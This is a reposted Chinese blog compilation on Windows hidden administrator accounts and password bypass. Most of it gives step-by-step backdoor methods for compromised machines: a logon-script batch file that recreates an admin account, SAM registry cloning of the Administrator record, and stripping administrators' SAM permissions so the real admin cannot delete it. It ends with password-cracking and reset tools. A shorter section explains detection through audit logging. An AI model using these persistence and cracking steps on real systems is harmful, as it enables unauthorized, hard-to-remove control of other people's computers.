zoukankan      html  css  js  c++  java
  • 系统管理:服务器超级隐藏账户的建立与检测大全[转载]

     
    建立一个别人永远删不掉的管理员用户

    操作步骤:
         1、在自己电脑里面建立一个.txt文本文件.
         2、在里面输入内容

    @echo off
    net user xixi 123456 /add 注释:前面xixi是用户名后面123456是密码;
    net localgroup administrators xixi /add

         3、把这个文件保存,更改后缀为xixi.bat 注释:前面名字随便,后面格式一定要是bat;
         4、把这个文件拷贝到对方电脑C:\WINNT\system32\GroupPolicy\User\Scripts\Logon文件目录下,没有的话自己创建。
         完成,下次对方电脑无论如何都有这个管理员帐号,删除了,下次启动还有!
         如果把里面的内容改成
    @echo off
    net user administrator 123456 /add


         意思是不管你怎么改,下次启动管理员帐号administrator密码一直是123456。


    二.俺认为上述的方法并不理想,可以用隐藏帐号方法来建帐号会更好 。
    操作步骤:
    1、首先建立一个帐号结尾要带$号 ,如果saturn$ , 密码自己随便,然后把帐号删除.
    2、将以下代码保存成(.reg)注册表形式
    代码如下:
    -------------------------------------------------------------------------------
    Windows Registry Editor Version 5.00
    [HKEY_LOCAL_MACHONE\SAM\SAM\Domains\Account\users\
    names\saturn$]
    @=hex(1f4):
    -------------------------------------------------------------------------------
    说明:1f4是Administrator帐号十六进制的值
    3、保存好后导入 ,然后用CMD命令设置密码
    net user saturn$ 123456

    这样一个隐形帐号就建立好了,用户在“本地用户和组”内根本无法看到这个帐号。所以也不存在删除帐号。记得千万别在同事的电脑上捣鼓哦,如果被查出来。。。。。嘿嘿:-)

    本文出自 51CTO.COM技术博客


    隐藏管理员帐号三分钟搞定

    对 regedit.exe我想大家都很熟悉,但却不能对注册表的项键设置权限,而regedt32.exe最大的优点就是能够对注册表的项键设置权限。 nt/2000/xp的帐户信息都在注册表的HKEY_LOCAL_MACHINE\\SAM\\SAM键下,但是除了系统用户SYSTEM外,其它用户 都无权查看到里面的信息,因此我首先用regedt32.exe对SAM键为我设置为“完全控制”权限。这样就可以对SAM键内的信息进行读写了了。具体 步聚如下:

    1、假设我们是以超级用户administrator登录到开有终端服务的肉鸡上的,首先在命令行下或帐户管理器中建立一个帐户:hacker$,这里我在命令行下建立这个帐户 net user hacker$ 1234 /add

    2、在开始/运行中输入:regedt32.exe并回车来运行regedt32.exe。

    3、点“权限”以后会弹出窗口点添加将我登录时的帐户添加到安全栏内,这里我是以administrator的身份登录的,所以我就将 administrator加入,并设置权限为“完全控制"。这里需要说明一下:最好是添加你登录的帐户或帐户所在的组,切莫修改原有的帐户或组,否则将 会带来一系列不必要的问题。等隐藏超级用户建好以,再来这里将你添加的帐户删除即可。

    4、再点“开始”→“运行”并输 入"regedit.exe" 回车,启动注册表编辑器regedit.exe。 打开键:HKEY_LOCAL_MAICHINE\\SAM\\SAM\\Domains\\account\\user\\names http://www.cnblogs.com/Fooo/admin/file://hacker$/"

    5、将项hacker$、00000409、000001F4导出为hacker.reg、409.reg、 1f4.reg,用记事本分别打这几个导出的文件进行编辑,将超级用户对应的项000001F4下的键"F"的值复制,并覆盖hacker$对应的项 00000409下的键"F"的值,然后再将00000409.reg与hacker.reg合并。

    6、在命令行下执行net user hacker$ /del将用户hacker$删除:net user hacker$ /del

    7、在regedit.exe的窗口内按F5刷新,然后打文件-导入注册表文件将修改好的hacker.reg导入注册表即可

    8、到此,隐藏的超级用户hacker$已经建好了,然后关闭regedit.exe。在regedt32.exe窗口内把HKEY_LOCAL_MACHINE\\SAM\\SAM键权限改回原来的样子(只要删除添加的帐户administrator即可)。

    9、注意:隐藏的超级用户建好后,在帐户管理器看不到hacker$这个用户,在命令行用“net user”命令也看不到,但是超级用户建立以后,就不能再改密码了,如果用net user命令来改hacker$的密码的话,那么在帐户管理器中将又会看这个隐藏的超级用户了,而且不能删除。

    建立与删除隐藏的管理员帐号
    当黑客入侵一台主机后,会想方设法保护自己的“劳动成果”,因此会在肉鸡上留下种种后门来长时间得控制肉鸡,其中使用最多的就是账户隐藏技术。在肉鸡上 建立一个隐藏的账户,以备需要的时候使用。账户隐藏技术可谓是最隐蔽的后门,一般用户很难发现系统中隐藏账户的存在,因此危害性很大,本文就对隐藏账户这 种黑客常用的技术进行揭密。

    在隐藏系统账户之前,我们有必要先来了解一下如何才能查看系统中已经存在的账户。在系统中可以进入“命令 提示符”,控制面板的“计算机管理”,“注册表”中对存在的账户进行查看,而管理员一般只在“命令提示符”和“计算机管理”中检查是否有异常,因此如何让 系统账户在这两者中隐藏将是本文的重点。

    一、“命令提示符”中的阴谋
    其实,制作系统隐藏账户并不是十分高深的技术,利用我们平时经常用到的“命令提示符”就可以制作一个简单的隐藏账户。
    点击“开始”→“运行”,输入“CMD”运行“命令提示符”,输入“net user piao$ 123456 /add”,回车,成功后会显示“命令成功完成”。接着输入“net localgroup administrators piao$ /add”回车,这样我们就利用“命令提示符”成功得建立了一个用户名为“piao$”,密码为“123456”的简单“隐藏账户”,并且把该隐藏账户提 升为了管理员权限。
    我们来看看隐藏账户的建立是否成功。在“命令提示符”中输入查看系统账户的命令“net user”,回车后会显示当前系统中存在的账户。从返回的结果中我们可以看到刚才我们建立的“piao$”这个账户并不存在。接着让我们进入控制面板的“ 管理工具”,打开其中的“计算机”,查看其中的“本地用户和组”,在“用户”一项中,我们建立的隐藏账户“piao$”暴露无疑。
    可以总结得出的结论是:这种方法只能将账户在“命令提示符”中进行隐藏,而对于“计算机管理”则无能为力。因此这种隐藏账户的方法并不是很实用,只对那些粗心的管理员有效,是一种入门级的系统账户隐藏技术。

    二、在“注册表”中玩转账户隐藏
    从上文中我们可以看到用命令提示符隐藏账户的方法缺点很明显,很容易暴露自己。那么有没有可以在“命令提示符”和“计算机管理”中同时隐藏账户的技术呢?答案是肯定的,而这一切只需要我们在“注册表”中进行一番小小的设置,就可以让系统账户在两者中完全蒸发。

    1、峰回路转,给管理员注册表操作权限
    在注册表中对系统账户的键值进行操作,需要到“HKEY_LOCAL_MACHINE\SAM\SAM”处进行修改,但是当我们来到该处时,会发现无法 展开该处所在的键值。这是因为系统默认对系统管理员给予“写入DAC”和“读取控制”权限,没有给予修改权限,因此我们没有办法对“SAM”项下的键值进 行查看和修改。不过我们可以借助系统中另一个“注册表编辑器”给管理员赋予修改权限。
    点击“开始”→“运行”,输入 “regedt32.exe”后回车,随后会弹出另一个“注册表编辑器”,和我们平时使用的“注册表编辑器”不同的是它可以修改系统账户操作注册表时的权 限(为便于理解,以下简称regedt32.exe)。在regedt32.exe中来到“HKEY_LOCAL_MACHINE\SAM\SAM”处, 点击“安全”菜单→“权限”,在弹出的“SAM的权限”编辑窗口中选中“administrators”账户,在下方的权限设置处勾选“完全控制”,完成 后点击“确定”即可。然后我们切换回“注册表编辑器”,可以发现“HKEY_LOCAL_MACHINE\SAM\SAM”下面的键值都可以展开了。
    提示:上文中提到的方法只适用于Windows NT/2000系统。在Windows XP系统中,对于权限的操作可以直接在注册表中进行,方法为选中需要设置权限的项,点击右键,选择“权限”即可。

    2、偷梁换柱,将隐藏账户替换为管理员
    成功得到注册表操作权限后,我们就可以正式开始隐藏账户的制作了。来到注册表编辑器的“HKEY_LOCAL_MACHINE\SAM\SAM \Domains\Account\Users\Names”处,当前系统中所有存在的账户都会在这里显示,当然包括我们的隐藏账户。点击我们的隐藏账户 “piao$”,在右边显示的键值中的“类型”一项显示为0x3e9,向上来到“HKEY_LOCAL_MACHINE\SAM\SAM\Domains \Account\Users\”处,可以找到“000003E9”这一项,这两者是相互对应的,隐藏账户“piao$”的所有信息都在 “000003E9”这一项中。同样的,我们可以找到“administrator”账户所对应的项为“000001F4”。
    将 “piao$”的键值导出为piao$.reg,同时将“000003E9”和“000001F4”项的F键值分别导出为 user.reg,admin.reg。用“记事本”打开admin.reg,将其中“F”值后面的内容复制下来,替换user.reg中的“F”值内 容,完成后保存。接下来进入“命令提示符”,输入“net user piao$ /del”将我们建立的隐藏账户删除。最后,将piao$.reg和user.reg导入注册表,至此,隐藏账户制作完成。

    3、过河拆桥,切断删除隐藏账户的途径
    虽然我们的隐藏账户已经在“命令提示符”和“计算机管理”中隐藏了,但是有经验的系统管理员仍可能通过注册表编辑器删除我们的隐藏账户,那么如何才能让我们的隐藏账户坚如磐石呢?
    打开“regedt32.exe”,来到“HKEY_LOCAL_MACHINE\SAM\SAM”处,设置“SAM”项的权限,将 “administrators”所拥有的权限全部取消即可。当真正的管理员想对“HKEY_LOCAL_MACHINE\SAM\SAM”下面的项进行 操作的时候将会发生错误,而且无法通过“regedt32.exe”再次赋予权限。这样没有经验的管理员即使发现了系统中的隐藏账户,也是无可奈何的。

    三.专用工具,使账户隐藏一步到位
    虽然按照上面的方法可以很好得隐藏账户,但是操作显得比较麻烦,并不适合新手,而且对注册表进行操作危险性太高,很容易造成系统崩溃。因此我们可以借助专门的账户隐藏工具来进行隐藏工作,使隐藏账户不再困难,只需要一个命令就可以搞定。
    我们需要利用的这款工具名叫“HideAdmin”,下载下来后解压到c盘。然后运行“命令提示符”,输入“HideAdmin piao$ 123456”即可,如果显示“Create a hiden Administrator piao$ Successed!”,则表示我们已经成功建立一个账户名为piao$,密码为123456的隐藏账户。利用这款工具建立的账户隐藏效果和上文中修改注 册表的效果是一样的。

    四、把“隐藏账户”请出系统
    隐藏账户的危害可谓十分巨大。因此我们有必要在了解了账户隐藏技术后,再对相应的防范技术作一个了解,把隐藏账户彻底请出系统。

    1、添加“$”符号型隐藏账户
    对于这类隐藏账户的检测比较简单。一般黑客在利用这种方法建立完隐藏账户后,会把隐藏账户提升为管理员权限。那么我们只需要在“命令提示符”中输入 “net localgroup administrators”就可以让所有的隐藏账户现形。如果嫌麻烦,可以直接打开“计算机管理”进行查看,添加“$”符号的账户是无法在这里隐藏 的。

    2、修改注册表型隐藏账户
    由于使用这种方法隐藏的账户是不会在“命令提示符”和“计算机管理”中看到的,因此可以到 注册表中删除隐藏账户。来到“HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names”,把这 里存在的账户和“计算机管理”中存在的账户进行比较,多出来的账户就是隐藏账户了。想要删除它也很简单,直接删除以隐藏账户命名的项即可。

    3、无法看到名称的隐藏账户
    如果黑客制作了一个修改注册表型隐藏账户,在此基础上删除了管理员对注册表的操作权限。那么管理员是无法通过注册表删除隐藏账户的,甚至无法知道黑客建 立的隐藏账户名称。不过世事没有绝对,我们可以借助“组策略”的帮助,让黑客无法通过隐藏账户登陆。点击“开始”→“运行”,输入 “gpedit.msc”运行“组策略”,依次展开“计算机配置”→“Windows 设置”→“安全设置”→“本地策略”→“审核策略”,双击右边的“审核策略更改”,在弹出的设置窗口中勾选“成功”,然后点“确定”。对“审核登陆事件” 和“审核过程追踪”进行相同的设置。
    进行登陆审核后,可以对任何账户的登陆操作进行记录,包括隐藏账户,这样我们就可以通过“计算机管理”中 的“事件查看器”准确得知隐藏账户的名称,甚至黑客登陆的时间。即使黑客将所有的登陆日志删除,系统还会记录是哪个账户删除了系统日志,这样黑客的隐藏账 户就暴露无疑了。
    得知隐藏账户的名称后就好办了,但是我们仍然不能删除这个隐藏账户,因为我们没有权限。但是我们可以在“命令提示符”中输入“net user 隐藏账户名称 654321”更改这个隐藏账户的密码。这样这个隐藏账户就会失效,黑客无法再用这个隐藏账户登陆。


    win2003下创建永远的隐藏帐户操作一、二

    前段时间比较流行的一句话”肉机”其实要想控制远端的计算机,那我想就少不了隐藏用户帐号的问题了,其实创建隐藏用户帐号还是比较简单的,现在我就把创建隐藏用户帐号告诉大家。

    其实每一个用户帐号在注册表中都有自己帐号数据项

    首先我们看看管理员在注册表中的数据项是什么样的(


    操作一、打开注册表:HKEY_LOCAL_MACHINE\SAM\SAM

    SAM是保存用户帐号的地方,不过这个“项”在默认情况下是不可见的。我们如果想看内部的内容就必须首先对其授权。(建议对注册表不是很熟悉的朋友不要随便改动注册表)

    操作二、认识注册表中的帐号分类

    在OS中的用户帐号无论是内置帐号,还是后建帐号,在注册表中都能看见。不过有两个帐号大家一定要能够认识,那就是管理员帐号和guest帐号。


    ”000001fa4”表示的是管理员帐号,即使管理员帐号被重命名了这个值也是不会变的,所以我们可以通过这个值来判断,重命名后的管理员帐号。

    “000001fa5” 表示的是guest帐号,同样这个值也不会因为,来宾帐号给重命名而改变。剩下的其 它值基本上就是后来创建的用户帐号,生成值了。 认识了注册表后,现在我们就来利用”net user”命令创建帐号了,创建隐藏帐号必须在CMD下。有关常见的命令,这些命令也可以在OS的帮助中找到。

    操作三、利用”net user”命令创建帐号

    一、先建立隐藏用户 xbx$ 1、net user xbx$ 123,abc /add 这里的意思是说,建立个xbx$ 帐户密码是123,abc(如下图)


    图3

    1、C:\Documents and Settings\Administrator>net localgroup administrators xbx$ /add 这里的意思是说把xbx,以便让我们创建用户具备管理员权限。

    一、观察注册表中的变化,并对注册表做相应的修改。 HKEY_LOCAL_MACHINE\SAM\SAM

    1、找到我们刚刚创建的用户帐号(如图)


    图4

    在这幅图中我们可以看见”000003f6”就是我们刚新建立的”xbx

    2、在注册表中多帐号权限复制

    找到HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users 这个项,打开”000001f4”项,然后再打开”F”(如下图)。


    图5

    然后将这里面的值,全选,粘帖并覆盖到”000003f6”的”F”值.

    3、导出注册表值

    现在将注册表中的“000001f4”、“000003f6”和“xbx"都导入出来,可直接将Users所有键值都导出来,到文件.


    图6

    4、删除帐号

    接下来我们再次进入“CMD”中删除“xbx


    图7

    删除帐号后,则注册表中的值也就没有了,这个时候我们再把刚才导出的注册表项,导入到注册表中。 这个时候我们打开“本地计算机用户和组”就看不见“xbx"

    系统密码破解方法总结

    一、ERD2003

    利用ERD2003强行修改系统管理员密码的方法简单、易于操作,且对2000/xp/2003系统均有效。下面就具体介绍一下这个软件的用法。

    1.下载ERD2003的iso,刻录成可启动的CD,注意别搞错了,直接刻录镜像最好。

    2.设置系统从光盘启动,进入“系统”后,ERD2003会针对系统的网络等硬件设备进行一些设置,总之遇到要你选择时一概选“yes”即可。

    3.接下来ERD2003会在你的硬盘里搜索所有已安装的系统,再让你选择要修改的系统。

    4.耐心等待,进入系统后:按start—administrative tools—locksmith,进入强行修改密码的界面,随后弹出的对话框会让你选择要修改密码的用户名,选择后即可强行修改密码而不用输入原始密码,然后点击NEXT,之后重启。

    二、PASSWARE KIT 5.0中的Windows KEY 5.0

    也有一些工具光盘里有这个程序,直接光盘运行就可以了。

    如果找不到这种光盘,运行PASSWARE KIT 5.0后生成3个文件:TXTSETUP.OEM、WINKEY.SYS和WINKEY.INF,3个文件共50KB。

    把这3个文件放在任何软盘中,然后使用XP安装光盘启动电脑,启动过程中按F6键让系统采用第三方驱动程序。

    此 时,正是我们切入的最好时机,放入该软盘就会自动跳到Windows KEY的界面。软件会自动检测系统中安装的Windows 2000/XP/2003并列一个表供用户选择,当出现提示“Please enter your selection 1..? or 0 to quit:”(根据检测到已安装操作系统的数量,“?”可能是1到9之间的某个数字)时,按相应的数字键进行选择。接着出现提示“Set local Administrator password to‘12345’?(Y/N):”,即问是否把“Administrator”的密码修改为“12345”,按Y键,软件首先自动备份原密码,然后把 “Administrator”的密码修改为“12345”。从光驱中取出光盘,重新启动计算机,如果Windows XP欢迎界面中没有列出“Administrator”用户,那么就连续按两次“Ctrl+Alt+Del”组合键,这时就会出现输入用户名和密码的界 面,在“用户名”中输入“Administrator”,在“密码”中输入“12345”,单击“确定”按钮就可以登录Windows XP了。

    提示:第一次登录Windows XP,系统会提示你密码已到期,要不要进行修改。你可以根据需要自行选择。

    这 个方法还可以恢复原来的密码 !!如果只是临时使用系统,使用完Windows XP后还想恢复原来的“Administrator”的密码,可按下面的方法操作。 先按照修改“Administrator”密码的步骤一和步骤二进行操作,接着就会出现提示“Would you like to undo Windows XP/2000/NT Key changes?(Y/N):”,按Y键,软件就会自动恢复原来的“Administrator”密码,接着又出现提示“Set local Administrator password to ‘12345’?(Y/N):”,按N键,不要把“Administrator”的密码修改为“12345”。从光驱中取出光盘,重新启动计算机,就完成 了密码恢复。

    三、DreamPackPL

    将下载回来的软件DreamPackPL解压缩到硬盘上一个方便的位置,然后运 行其中的DreamPack.exe文件,在软件界面上选中放入Windows安装光盘的光驱,然后点击“Make ISO CD image”按钮,程序将创建一个ISO格式的光盘镜像,并需要你指定保存该镜像文件的目录。创建好后用光盘刻录软件将该镜像文件刻录到光盘中,然后使用 这张光盘引导电脑启动。Windows的安装程序将会自动运行,到某时按R键进入故障恢复控制台。随后安装程序会自动显示所有已经安装的Windows操 作系统,使用数字键选择你想要进入的操作系统的故障恢复控制台,然后按下回车。当需要输入管理员密码的时候也不用担心,我们并不知道密码是什么,但是我们 要只要,直接按下回车就可以跳过这一步。随后进入System32文件夹:cd system32,并把该目录下的文件sfcfiles.dll重命名为其他名称:ren sfcfiles.dll sfcfiles.lld。接着我们从光盘中I386目录下复制文件pinball.ex_到System32文件夹中,并命名为 sfcfiles.dll:copy d:\i386\ pinball.ex_ sfcfiles.dll。至此前期工作已经全部做完了,把光盘拿出来,然后输入exit命令退出控制台,并重启动电脑。以上所作的一切只是为了替换系统 中的sfcfiles.dll文件,因此如果你的操作系统安装在FAT32文件系统的分区上,那就更简单了,只要直接用Windows 98启动盘引导电脑进入DOS,并在dos下用DreamPackPL软件压缩包中的sfcfiles.dll文件替换System32目录下的原同名文 件即可(注意不要忘了Windows的文件保护,备份文件也要替换)。

    忘记了电脑中管理员帐户的密码。那么可以在重启后显示的界面上点击“Details”按钮,随后可以看到和平常的帐户管理界面类似界面,选中想要修改密码的帐户,然后点击窗口下方的“重设密码”按钮,输入新的密码后点击确定即可。

    四、其他的方法

    1.一个dos下破解密码的软件,dosPASS。

    2.直接用安装盘启动安装界面时按Shift+F10,打开一个命令行窗口,用net user administrator 123 修改密码为123,用SHIFT+F10打开CMD后运行SET不加参数可以看到密码。

    3. 使用OFFICE NT PASSWORD & REGISTRY EDITOR。用该软件可以制作LINUX启动盘,这个启动盘可以访问NTFS文件系统,因此可以很好地支持Windows 2000/XP。使用该软盘中的一个运行在LINUX下的工具NTPASSWD就可以解决问题,并且可以读取注册表并重写账号。使用方法很简单,只需根据 其启动后的提示一步一步做就可以了。在此,建议你使用快速模式,这样会列出用户供你选择修改那个用户密码。默认选择ADMIN组用户,自动找到把 ADMINISTRATOR的名字换掉的用户,十分方便。

    五、网上其他一些传说中破解Windows2000/WindowsXP/Windows2003密码的方法

    1.进入dos删除sam文件——这种方法对win2000有效,对xp和2003不但无效,还会导致系统死锁而彻底无法使用。

    2.用winpe启动进控制台,然后用dos命令手动增添用户——除非原来管理员密码(指的是安全模式下的那个管理员)就没有设置,否则无效。

    3. 将屏幕保护改名,将cmd.exe改名为logon.scr(当然要挂在别的机器上改了),开机后等待10分钟进入屏幕保护,实际上就进入了 dos命令行界面,可以用net命令加用户——已证明在sp1、sp2、2003中,这样进入dos后的权限根本不是管理员,因此也无法添加用户。

    4. 硬盘挂到别的机器上,考出system32文件夹中的sam文件,用lc4暴力解密——理论上是可以的,打开并新建一个任务,然后依次击 “IMPORT→Import from SAM file”,打开已待破解的SAM文件,此时LC4会自动分析此文件,并显示出文件中的用户名;之后点击“Session→Begin Audit”,即可开始破解密码。但如果密码比较复杂的话,解密时间会极其的长。

    5.如果机器联网了可以试试SMBCrack。

     

  • 相关阅读:
    friend ---- public and private
    c++中const使用详解
    In c++ access control works on per-class basis not on per-object basis.
    realloc 用法
    enum don't allocate any memory
    (转)C++ STL中的vector的内存分配与释放
    计算机网络面试总结
    Redis安装与测试
    Hbase的安装与测试
    使用ActiveMQ实现简易聊天功能
  • 原文地址:https://www.cnblogs.com/Fooo/p/1642050.html
Copyright © 2011-2022 走看看